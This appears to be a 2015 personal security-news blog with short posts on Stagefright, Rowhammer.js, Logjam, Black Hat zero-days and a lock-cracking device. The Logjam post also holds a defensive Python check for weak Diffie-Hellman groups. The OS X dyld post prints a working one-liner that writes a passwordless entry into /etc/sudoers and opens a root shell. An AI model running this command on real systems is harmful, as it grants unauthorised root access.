Jul 15 28

Full disclosure at BlackHat 2015!

‘Stagefright’ gets the title of ‘Mother of all Android Vulnerabilities’, as it impacts 95% of all Android devices out there and does not require any interaction with the victim.

The cause of the problem appears to be a memory error in the processing of MPEG4 and 3GPP video files.

written by d45id

Jul 15 25

In this paper we [Daniel Gruss, Clémentine Maurice, Stefan Mangard] present Rowhammer.js, a JavaScript-based implementation of the Rowhammer attack. Our attack uses an eviction strategy found by a generic algorithm that improves the eviction rate compared to existing eviction strategies from 95.2% to 99.99%. Rowhammer.js is the first remote software-induced hardware-fault attack. In contrast to other fault attacks it does not require physical access to the machine, or the execution of native code or access to special instructions. As JavaScript-based fault attacks can be performed on millions of users stealthily and simultaneously, we propose countermeasures that can be implemented immediately.

written by d45id

Jul 15 23

Security expert Stefan Esser discovered a privilege escalation vulnerability in OS X 10.10. The vulnerability is found in the dynamic linker dyld.

echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s

The OS X 10.11 pre-release candidate is not vulnerable. For everyone who wants to fix the problem as soon as possible, Esser has published a patch.

written by d45id

Jul 15 21

…a very interesting article published in Wired magazine about wireless carjacking.

written by d45id

Jul 15 18

More than 30 zero-day flaws will be presented at the Black Hat USA 2015 security conference.

“We have 32 different zero-day vulnerabilities that will be disclosed at the event,” Wylie said. “The zero-days come from a broad swath of topics, including mobile and SCADA [supervisory control and data acquisition] systems.”

I am very curious already.

written by d45id

Jul 15 10

I’ve seen a very interesting LEGO construction at Hannover IdeenExpo: a nearly fully automated paper cube production machine.

written by d45id

May 15 20

Crypto researchers discovered a new ancient bug in Diffie-Hellman cryptography. The problem is that servers that support 512-bit “export-grade” Diffie-Hellman (DH) can be forced to downgrade a connection to that weak level. The server – and therefore the client – will both still believe they’re using stronger keys such as 768-bit or 1024-bit.

Matthew Green – one of the researchers – has hosted a site discussing what’s being called “#Logjam”, Weakdh.org, with a detailed paper – Imperfect Forward Secrecy: How Diffie-Hellman Fails in Practice (PDF) – that explains the bug in an academic way.

written by d45id
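A client-side check against the Logjam downgrade described in the post above, as an added example that is not from the original post or the Logjam paper: it parses the DH parameters a TLS server sends in its ServerKeyExchange message (the ServerDHParams layout of RFC 5246) and refuses a modulus below a minimum size. The 1024-bit default, the function names and the sample byte strings are assumptions constructed for illustration.

```python
"""Added example: check the DH group size in a TLS ServerKeyExchange body."""
import struct


class WeakDHError(ValueError):
    """Raised when the server's DH modulus is below the accepted size."""


def _read_opaque16(buf, off):
    """Read one TLS opaque<1..2^16-1> field: 2-byte big-endian length + data."""
    if off + 2 > len(buf):
        raise ValueError("truncated length field")
    (n,) = struct.unpack_from(">H", buf, off)
    off += 2
    if n == 0 or off + n > len(buf):
        raise ValueError("bad field length")
    return buf[off:off + n], off + n


def parse_server_dh_params(body):
    """Return (p, g, Ys) as integers from a ServerDHParams structure."""
    off, out = 0, []
    for _ in range(3):                      # dh_p, dh_g, dh_Ys in that order
        raw, off = _read_opaque16(body, off)
        out.append(int.from_bytes(raw, "big"))
    return tuple(out)


def check_dh_group(body, min_bits=1024):    # min_bits: assumed client policy
    """Return the modulus size in bits, or raise WeakDHError if too small."""
    p, _g, ys = parse_server_dh_params(body)
    bits = p.bit_length()                   # leading zero bytes do not count
    if bits < min_bits:
        raise WeakDHError(f"{bits}-bit DH modulus, need >= {min_bits}")
    if not 1 < ys < p - 1:                  # reject degenerate public values
        raise ValueError("server public value out of range")
    return bits


def _field(n):
    """Constructed sample helper: encode integer n as an opaque16 field."""
    raw = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return struct.pack(">H", len(raw)) + raw


# Constructed sample inputs (odd numbers of the right size, not real primes).
EXPORT_GRADE = _field((1 << 511) | 1) + _field(2) + _field(5)
STRONGER = _field((1 << 1023) | 1) + _field(2) + _field(5)
```

The check measures the modulus the server actually sent rather than trusting the negotiated cipher suite name, so a 512-bit group is refused even when the client asked for non-export DHE.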

May 15 14

Combo Breaker is a motorized, battery powered, 3D printed, Arduino-based combination lock cracking device.

Source code / 3D models: https://github.com/samyk/combobreaker

written by d45id